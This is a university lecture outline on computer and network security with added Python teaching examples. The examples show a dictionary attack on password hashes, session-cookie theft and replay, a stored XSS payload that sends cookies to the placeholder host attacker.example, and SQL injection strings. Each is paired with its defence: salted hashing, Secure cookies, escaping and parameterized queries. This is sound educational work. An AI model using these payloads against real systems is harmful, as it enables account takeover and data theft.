CS 4001: Computing, Society & Professionalism
Munmun De Choudhury | Assistant Professor | School of Interactive Computing
Week 12: Computer and Network Security
March 30, 2017
Chapter Overview
• Introduction
• Hacking
• Malware
• Online voting
• Cybercrime and cyberattacks
7.1 Introduction
• Computers getting faster and less expensive
• Utility of networked computers increasing
  § Shopping and banking
  § Managing personal information
  § Controlling industrial processes
• Increasing use of computers → growing importance of computer security
7.2 Hacking
Hackers, Past and Present
• Original meaning of hacker: explorer, risk taker, system innovator
  § MIT's Tech Model Railroad Club in 1950s
• 1960s-1980s: Focus shifted from electronics to computers and networks
  § 1983 movie WarGames
• Modern meaning of hacker: someone who gains unauthorized access to computers and computer networks
Obtaining Login Names and Passwords
• Brute force methods and dictionary attacks
• Eavesdropping
• Dumpster diving
• Social engineering
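Added example (not part of the lecture slides): what a dictionary attack looks like against a stolen password store, and why the way passwords are stored decides how far it gets. The wordlist and the "leaked" accounts are constructed for the demo; the iteration count is an assumption chosen to keep the run short.

```python
import hashlib
import os

# Constructed sample wordlist; real attacks use lists of millions of leaked passwords.
WORDLIST = ["123456", "password", "letmein", "qwerty", "hunter2", "correcthorse"]

def sha256_hex(password):
    return hashlib.sha256(password.encode()).hexdigest()

# Constructed "leaked" credential store, unsalted: identical passwords give identical
# hashes, so hashing each candidate word once tests it against every user at the same time.
LEAKED_UNSALTED = {
    "alice": sha256_hex("letmein"),
    "bob": sha256_hex("hunter2"),
    "carol": sha256_hex("Tr0ub4dor&3"),  # not in the wordlist: survives this attack
}

def dictionary_attack_unsalted(store, wordlist):
    """Precompute hash(word) once per word, then look every stored hash up in that table."""
    table = {sha256_hex(word): word for word in wordlist}
    return {user: table[digest] for user, digest in store.items() if digest in table}

# The stronger design: a random per-user salt and a deliberately slow, iterated hash.
ITERATIONS = 50_000  # assumption for the demo; production settings are tuned higher

def pbkdf2_hex(password, salt, iterations=ITERATIONS):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()

def make_salted_store(credentials):
    store = {}
    for user, password in credentials.items():
        salt = os.urandom(16)
        store[user] = (salt, pbkdf2_hex(password, salt))
    return store

def dictionary_attack_salted(store, wordlist):
    """No shared table is possible: every guess must be re-hashed with each user's own
    salt, and each of those hashes costs ITERATIONS rounds.
    Returns (cracked accounts, number of slow hashes the attacker had to compute)."""
    cracked, hashes_computed = {}, 0
    for user, (salt, digest) in store.items():
        for word in wordlist:
            hashes_computed += 1
            if pbkdf2_hex(word, salt) == digest:
                cracked[user] = word
                break
    return cracked, hashes_computed

if __name__ == "__main__":
    print("unsalted SHA-256:", dictionary_attack_unsalted(LEAKED_UNSALTED, WORDLIST))
    salted = make_salted_store({"alice": "letmein", "bob": "hunter2", "carol": "Tr0ub4dor&3"})
    cracked, work = dictionary_attack_salted(salted, WORDLIST)
    print("salted PBKDF2:", cracked, "after", work, "slow hashes of", ITERATIONS, "rounds each")
```

Both designs still lose the accounts whose passwords are in the wordlist; the salted, iterated hash does not make a weak password strong, it makes each guess cost the attacker as much as it costs the server, and removes the shortcut of testing one hash against every account at once.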
Sidejacking
• Sidejacking: hijacking of an open Web session by capturing a user's cookie
• Sidejacking possible on unencrypted wireless networks because many sites send session cookies "in the clear" (over plain HTTP rather than HTTPS), so anyone on the same network can read and reuse them
• Internet security community complained about sidejacking vulnerability for years, but e-commerce sites did not change practices
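Added example (not part of the lecture, and not Firesheep's code): the two halves of sidejacking in one script. The attacker side lifts the session cookie out of a sniffed plaintext request and builds a replay; the defender side audits a Set-Cookie response for what made that possible. The captured request, the two responses, the host name social.example and the list of session-cookie names are all constructed assumptions for the demo.

```python
from http.cookies import SimpleCookie

# Constructed sample of a plaintext HTTP request, exactly what anyone on the same open
# Wi-Fi network can read: the session cookie travels in the clear.
CAPTURED_REQUEST = (
    "GET /home HTTP/1.1\r\n"
    "Host: social.example\r\n"
    "Cookie: sessionid=8f3a2c9d; theme=dark\r\n"
    "\r\n"
)

# Constructed sample responses: the first sets the session cookie the way the slide
# describes (usable over http://), the second marks it Secure and HttpOnly and adds HSTS.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: sessionid=8f3a2c9d; Path=/\r\n"
    "\r\n"
)
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: sessionid=8f3a2c9d; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "Strict-Transport-Security: max-age=31536000\r\n"
    "\r\n"
)

# Cookie names treated as session identifiers (assumption for the demo).
SESSION_NAMES = {"sessionid", "phpsessid", "jsessionid", "sid"}

def parse_headers(raw):
    """Split a raw HTTP message into (start line, [(lower-case name, value), ...])."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers

def steal_session_cookie(raw_request):
    """The sidejacker's step: lift the session cookie out of a sniffed plaintext request."""
    _, headers = parse_headers(raw_request)
    for name, value in headers:
        if name != "cookie":
            continue
        jar = SimpleCookie()
        jar.load(value)
        for key, morsel in jar.items():
            if key.lower() in SESSION_NAMES:
                return key, morsel.value
    return None

def forge_request(path, host, cookie):
    """Replay: the server sees the victim's session cookie and cannot tell who sent it."""
    key, value = cookie
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {key}={value}\r\n\r\n"

def audit_set_cookie(raw_response):
    """Server-side check: list what lets a session cookie be sidejacked."""
    _, headers = parse_headers(raw_response)
    findings = []
    if not any(name == "strict-transport-security" for name, _ in headers):
        findings.append("no Strict-Transport-Security header: browser may still use http://")
    for name, value in headers:
        if name != "set-cookie":
            continue
        jar = SimpleCookie()
        jar.load(value)
        for key, morsel in jar.items():
            if key.lower() not in SESSION_NAMES:
                continue
            if not morsel["secure"]:
                findings.append(f"{key}: missing Secure flag, sent in the clear over http://")
            if not morsel["httponly"]:
                findings.append(f"{key}: missing HttpOnly flag, readable by injected script")
    return findings

if __name__ == "__main__":
    cookie = steal_session_cookie(CAPTURED_REQUEST)
    print("captured:", cookie)
    print(forge_request("/home", "social.example", cookie))
    print("weak response findings:", audit_set_cookie(WEAK_RESPONSE))
    print("hardened response findings:", audit_set_cookie(HARDENED_RESPONSE))
```

The Secure flag is what stops the browser from ever sending the cookie over plain HTTP, which is the fix the slide says sites were slow to adopt; HSTS closes the gap where a user types an http:// address and the first request goes out unencrypted.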
Computer Fraud and Abuse Act
• Criminalizes wide variety of hacker-related activities
  § Transmitting code that damages a computer
  § Accessing any Internet-connected computer without authorization
  § Transmitting classified government information
  § Trafficking in computer passwords
  § Computer fraud
  § Computer extortion
• Maximum penalty: 20 years in prison and $250,000 fine
Other Laws
• Electronic Communications Privacy Act (cannot intercept electronic communications or read email without authorization)
• Wire Fraud Act, National Stolen Property Act, Identity Theft and Assumption Deterrence Act
Class Activity 1: Case Study of Firesheep
Firesheep: Act Utilitarian Analysis
• Release of Firesheep led media to focus on security problem
• Benefits were high: a few months later Facebook and Twitter made their sites more secure
• Harms were minimal: no evidence that release of Firesheep caused big increase in identity theft or malicious pranks
• Conclusion: Release of Firesheep was good
Firesheep: Kantian Analysis
• Accessing someone else's user account is an invasion of their privacy and is wrong
• Butler provided a tool that made it much simpler for people to do something that is wrong, so he has some moral accountability for their misdeeds
• Butler was willing to tolerate short-term increase in privacy violations in hope that media pressure would force Web retailers to add security
• He treated victims of Firesheep as a means to his end
• It was wrong for Butler to release Firesheep
Firesheep: Virtue Ethics Analysis
• Butler shared expertise and knowledge to help people and educate them about the privacy risks of using some non-encrypted websites
• Butler exhibited courage by taking personal responsibility for creating Firesheep, and he demonstrated benevolence by making it freely available
• Butler's interest in promoting the common good
7.3 Malware
Viruses
• Virus: Piece of self-replicating code embedded within another program (host)
• Viruses associated with program files
  § Hard disks, floppy disks, CD-ROMs
  § Email attachments
• How viruses spread
  § Diskettes or CDs
  § Email
  § Files downloaded from Internet
How a Virus Replicates
Email Attachment with Possible Virus
How an Email Virus Spreads
Antivirus Software Packages
• Allow computer users to detect and destroy viruses
• Must be kept up-to-date to be most effective
• Many people do not keep their antivirus software packages up-to-date
• Consumers need to beware of fake antivirus applications
Worm
• Self-contained program (unlike a virus, it needs no host program to carry it)
• Spreads through a computer network
• Exploits security holes in networked computers
How a Worm Spreads
Cross-site Scripting
• Another way malware may be downloaded without user's knowledge
• Problem appears on Web sites that allow people to read what others have posted, when the site shows a post back to visitors without escaping it
• Attacker injects client-side script into a Web site (for example, as the text of a comment or profile field)
• Victim's (the next user's) browser executes script, which may steal cookies, track user's activity, or perform another malicious action
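Added example (not from the lecture): the rendering flaw behind stored cross-site scripting and its fix, side by side. A constructed attacker comment carrying a cookie-stealing script is rendered into a page two ways, and the page is then parsed the way a browser would to count how many script elements would actually run. The comments, the page template and the placeholder host attacker.example are assumptions made for the demo.

```python
import html
from html.parser import HTMLParser

# Constructed attacker post on a site that shows visitors what other users have posted.
# The payload ships document.cookie to a host the attacker controls (attacker.example
# is a placeholder, not a real host).
ATTACKER_COMMENT = (
    "Great article! <script>"
    "new Image().src='http://attacker.example/c?'+encodeURIComponent(document.cookie);"
    "</script>"
)
BENIGN_COMMENT = "Use <b>bold</b> sparingly & cite sources."

PAGE_TEMPLATE = "<html><body><h1>Comments</h1>{comments}</body></html>"

def render_comment_unsafe(comment):
    """Vulnerable: the stored post is pasted into the page as HTML, so its <script>
    runs in every later visitor's browser."""
    return '<div class="comment">' + comment + "</div>"

def render_comment_safe(comment):
    """Hardened: <, >, &, and quotes become entities, so the browser displays the text
    of the post instead of interpreting it as markup."""
    return '<div class="comment">' + html.escape(comment, quote=True) + "</div>"

def render_page(comments, renderer):
    return PAGE_TEMPLATE.format(comments="".join(renderer(c) for c in comments))

class ScriptTagCounter(HTMLParser):
    """Parse the page the way a browser would and count <script> elements it would run."""
    def __init__(self):
        super().__init__()
        self.script_tags = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1

def count_script_tags(page_html):
    parser = ScriptTagCounter()
    parser.feed(page_html)
    parser.close()
    return parser.script_tags

if __name__ == "__main__":
    posts = [BENIGN_COMMENT, ATTACKER_COMMENT]
    for renderer in (render_comment_unsafe, render_comment_safe):
        page = render_page(posts, renderer)
        print(renderer.__name__, "-> executable <script> tags:", count_script_tags(page))
```

Escaping on output is the general rule; the benign comment's <b> tag is neutralised too, and a site that wants to allow some markup needs an allowlist-based sanitizer rather than a blocklist of dangerous tags. Note that html.escape is correct only for text placed in HTML element content; text placed inside an attribute, a JavaScript string or a URL needs the encoding for that context.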
Drive-by Downloads
• Unintentional downloading of malware caused by visiting a compromised Web site
• Also happens when Web surfer sees pop-up window asking permission to download software and clicks "Okay"
• Google Anti-Malware Team says 1.3 percent of queries to Google's search engine return a malicious URL somewhere on results page
Trojan Horses and Backdoor Trojans
• Trojan horse: Program with benign capability that masks a sinister purpose
• Backdoor Trojan: Trojan horse that gives attacker access to victim's computer
  § May claim to cleanse malware from a user's computer, but in reality it installs spyware
Rootkits
• Rootkit: A set of programs that gives an attacker privileged (root or administrator-level) access to a computer while hiding that access
• Activated every time computer is booted
• Uses its security privileges to mask its presence from the user and from security software
Spyware and Adware
• Spyware: Program that communicates over an Internet connection without user's knowledge or consent
  § Monitor Web surfing
  § Log keystrokes
  § Take snapshots of computer screen
  § Send reports back to host computer
• Adware: Type of spyware that displays pop-up advertisements related to user's activity
• Backdoor Trojans often used to deliver spyware and adware
Bots
• Bot: A kind of backdoor Trojan that responds to commands sent by a command-and-control program on another computer
• First bots supported legitimate activities
  § Internet Relay Chat
  § Multiplayer Internet games
• Other bots support illegal activities
  § Distributing spam
  § Collecting personal information for ID theft
  § Denial-of-service attacks
Botnets and Bot Herders
• Botnet: Collection of bot-infected computers controlled by the same command-and-control program
• Some botnets have over a million computers in them
• Bot herder: Someone who controls a botnet
Class Activity 2: The Internet Worm (Robert Tappan Morris Case Study)
Ethical Evaluation
• Kantian evaluation
  § Morris used others by gaining access to their computers without permission
• Social contract theory evaluation
  § Morris violated property rights of organizations
• Utilitarian evaluation
  § Benefits: Organizations learned of security flaws
  § Harms: Time spent by those fighting worm, unavailable computers, disrupted network traffic, Morris's punishments
• Morris was wrong to have released the Internet worm
Defensive Measures
• Security patches: Code updates to remove security vulnerabilities
• Anti-malware tools: Software to scan hard drives, detect files that contain viruses or spyware, and delete these files
• Firewall: Software on a single computer (a host-based firewall) or a dedicated network device that selectively blocks network traffic to and from the machines it protects
7.5 Online Voting
Motivation for Online Voting
• 2000 U.S. Presidential election closely contested
• Florida pivotal state
• Most Florida counties used punch-card voting machines
• Two voting irregularities traced to these machines
  § Hanging chad
  § "Butterfly ballot" in Palm Beach County
The Infamous "Butterfly Ballot"
[Photo of the Palm Beach County butterfly ballot: AP Photo/Gary I. Rothstein]
Group Activity: Ethical Evaluation of Online Voting: 1) Act Utilitarian Perspective; 2) Kantian Perspective
Suppose online voting replaced traditional voting
Utilitarian Analysis
• Benefit: Time savings
  § Assume 50% of adults actually vote
  § Suppose voter saves 1 hour by voting online
  § Average pay in U.S. is $18.00/hour
  § Time savings worth $9 per adult American
• Harm of DDoS attack difficult to determine
  § What is probability of a DDoS attack?
  § What is the probability an attack would succeed?
  § What is the probability a successful attack would change the outcome of the election?
Kantian Analysis
• The will of each voter should be reflected in that voter's ballot
• The integrity of each ballot is paramount
• Ability to do a recount necessary to guarantee integrity of each ballot
• There should be a paper record of every vote
• Eliminating paper records to save time and/or money is wrong
Conclusions
• Existing systems are highly localized
• Widespread tainting more possible with online system
• No paper records with online system
• Evidence of tampering with online elections
• Relying on security of home computers means system vulnerable to fraud
• Strong case for not allowing online voting
Benefits of Online Voting
• More people would vote
• Votes would be counted more quickly
• No ambiguity with electronic votes
• Cost less money
• Eliminate ballot box tampering
• Software can prevent accidental over-voting
• Software can prevent under-voting
Risks of Online Voting
• Gives unfair advantage to those with home computers
• More difficult to preserve voter privacy
• More opportunities for vote selling
• Obvious target for a DDoS attack
• Security of election depends on security of home computers
• Susceptible to vote-changing virus or RAT (remote access Trojan)
• Susceptible to phony vote servers
• No paper copies of ballots for auditing or recounts
7.4 Cyber Crime and Cyber Attacks
Phishing and Spear-phishing
• Phishing: Large-scale effort to gain sensitive information from gullible computer users
  § Phishing emails are sent to users asking them to enter sensitive information on an imposter website
  § At least 67,000 phishing attacks globally in second half of 2010
  § New development: phishing attacks on Chinese e-commerce sites
• Spear-phishing: Variant of phishing in which email addresses chosen selectively to target particular group of recipients
SQL Injection
• Method of attacking a database-driven Web application with improper security
• Attacker inserts (injects) SQL syntax into a text string sent from client to application; because the application builds its query by concatenating that string, the injected text becomes part of the query itself
• Application then returns sensitive information (or alters the database) that the query was never meant to expose
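Added example (not from the lecture): the query-building mistake described above against an in-memory SQLite table, with two constructed attacker inputs, beside the parameterized query that fixes it. The table, accounts and payloads are constructed for the demo; passwords are stored in plaintext only so the injected query stays readable.

```python
import sqlite3

def build_db():
    """Constructed in-memory stand-in for the Web application's user table.
    Passwords are plaintext only to keep the injection visible; real systems
    store salted, iterated hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, email TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, email) VALUES (?, ?, ?)",
        [("alice", "s3cret", "alice@example.org"), ("bob", "hunter2", "bob@example.org")],
    )
    return conn

def login_vulnerable(conn, username, password):
    """The flaw on the slide: the client's text is concatenated into the SQL statement,
    so quotes and keywords in that text change what the statement means."""
    sql = ("SELECT username, email FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()

def login_safe(conn, username, password):
    """The fix: a parameterized query. The driver sends the values separately from the
    statement text, so they are always compared as data and never parsed as SQL."""
    sql = "SELECT username, email FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()

# Constructed attacker inputs.
# 1) In the password field: closes the string literal and adds an always-true clause.
#    Resulting WHERE: username = 'x' AND password = '' OR '1'='1'   -> matches every row,
#    so the application hands back every user's email.
DUMP_ALL_PASSWORD = "' OR '1'='1"
# 2) In the username field: closes the literal and comments out the password check.
#    Resulting WHERE: username = 'bob' --' AND password = 'wrong'   -> logs in as bob.
AS_BOB_USERNAME = "bob' --"

if __name__ == "__main__":
    conn = build_db()
    print("legitimate login :", login_safe(conn, "alice", "s3cret"))
    print("vulnerable, dump :", login_vulnerable(conn, "x", DUMP_ALL_PASSWORD))
    print("vulnerable, bob  :", login_vulnerable(conn, AS_BOB_USERNAME, "wrong"))
    print("safe, same inputs:", login_safe(conn, "x", DUMP_ALL_PASSWORD),
          login_safe(conn, AS_BOB_USERNAME, "wrong"))
```

Escaping quotes by hand is not a substitute for parameters: the comment payload needs no closing quote at all, and every database has its own edge cases. Parameterized queries (or an ORM that uses them) are the fix; least-privilege database accounts limit what a query that does slip through can read or change.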
Denial-of-service and DDoS Attacks
• Denial-of-service attack: Intentional action designed to prevent legitimate users from making use of a computer service
• Aim of a DoS attack is not to steal information but to disrupt a server's ability to respond to its clients
• Distributed denial-of-service attack: DoS attack launched from many computers, such as a botnet
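Added example (not from the lecture): why the "distributed" part matters to a defender. Over a constructed access log, a per-client rate limit catches the single host flooding the server but sees nothing wrong during the botnet's attack, where every bot stays under the limit; only a view of total load per second, with a count of how many sources produced it, shows the DDoS. The log lines, the documentation addresses standing in for attackers, and the thresholds are assumptions for the demo.

```python
from collections import defaultdict

# Constructed access-log sample, one request per line: "<epoch_second> <client_ip> <request>".
# 198.51.100.7 and 203.0.113.0/24 are documentation addresses standing in for attackers.
def make_sample_log():
    lines = []
    # Ordinary traffic: two clients, one request each every 30 s.
    for t in range(0, 300, 30):
        lines.append(f"{t} 192.0.2.10 GET /index.html")
        lines.append(f"{t + 5} 192.0.2.11 GET /about.html")
    # Single-source DoS: one host sends 50 requests within second 100.
    lines += [f"100 198.51.100.7 GET /search?q={i}" for i in range(50)]
    # DDoS from a botnet: 40 hosts send 3 requests each within second 200,
    # every one of them below any per-client threshold a server would set.
    for bot in range(1, 41):
        lines += [f"200 203.0.113.{bot} GET /" for _ in range(3)]
    return lines

def parse(lines):
    for line in lines:
        ts, ip, _request = line.split(" ", 2)
        yield int(ts), ip

def per_source_alerts(lines, threshold):
    """Classic per-client rate limit: flag any source exceeding `threshold` requests
    in one second. Catches the single-source flood and nothing else."""
    counts = defaultdict(int)
    for ts, ip in parse(lines):
        counts[(ts, ip)] += 1
    return sorted({ip for (_ts, ip), n in counts.items() if n > threshold})

def aggregate_alerts(lines, capacity, per_source_threshold):
    """Flag every second whose total load exceeds the server's `capacity`, labelled
    'dos' if one source alone is over the per-source threshold and 'ddos' otherwise:
    the load came from many sources that each looked harmless."""
    per_second = defaultdict(lambda: defaultdict(int))
    for ts, ip in parse(lines):
        per_second[ts][ip] += 1
    alerts = []
    for ts in sorted(per_second):
        sources = per_second[ts]
        total = sum(sources.values())
        if total > capacity:
            kind = "dos" if max(sources.values()) > per_source_threshold else "ddos"
            alerts.append((ts, total, len(sources), kind))
    return alerts

if __name__ == "__main__":
    log = make_sample_log()
    print("per-source alerts:", per_source_alerts(log, threshold=20))
    for ts, total, n_sources, kind in aggregate_alerts(log, capacity=30, per_source_threshold=20):
        print(f"t={ts}s total={total} sources={n_sources} -> {kind}")
```

Detecting the DDoS is the easy half; a server that is already saturated cannot block 40 (or 40,000) sources fast enough on its own, which is why mitigation is done upstream, at the network edge or by a provider with more capacity than the botnet.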
The Rise and Fall of Blue Security Part I: The Rise
• Blue Security: An Israeli company selling a spam deterrence system
• Blue Frog bot would automatically respond to each spam message with an opt-out message
• Spammers started receiving hundreds of thousands of opt-out messages, disrupting their operations
• 6 of 10 of world's top spammers agreed to stop sending spam to users of Blue Frog
The Rise and Fall of Blue Security Part II: The Fall
• One spammer (PharmaMaster) started sending Blue Frog users 10-20 times more spam
• PharmaMaster then launched DDoS attacks on Blue Security and its business customers
• Blue Security could not protect its customers from DDoS attacks and virus-laced emails
• Blue Security reluctantly terminated its anti-spam activities
Attacks on Twitter and Other Social Networking Sites
• Massive DDoS attack made Twitter service unavailable for several hours on August 6, 2009
• Three other sites attacked at same time: Facebook, LiveJournal, and Google
• All sites used by a political blogger from the Republic of Georgia
• Attacks occurred on first anniversary of war between Georgia and Russia over South Ossetia
Anonymous
• Anonymous: loosely organized international movement of hacktivists (hackers with a social or political cause)
• Various DDoS attacks attributed to Anonymous members
Year  Victim                              Reason
2008  Church of Scientology               Attempted suppression of Tom Cruise interview
2009  RIAA, MPAA                          RIAA, MPAA's attempt to take down the Pirate Bay
2010  PayPal, VISA, MasterCard            Financial organizations freezing funds flowing to Julian Assange of WikiLeaks
2012  U.S. Dept. of Justice, RIAA, MPAA   U.S. Dept. of Justice action against Megaupload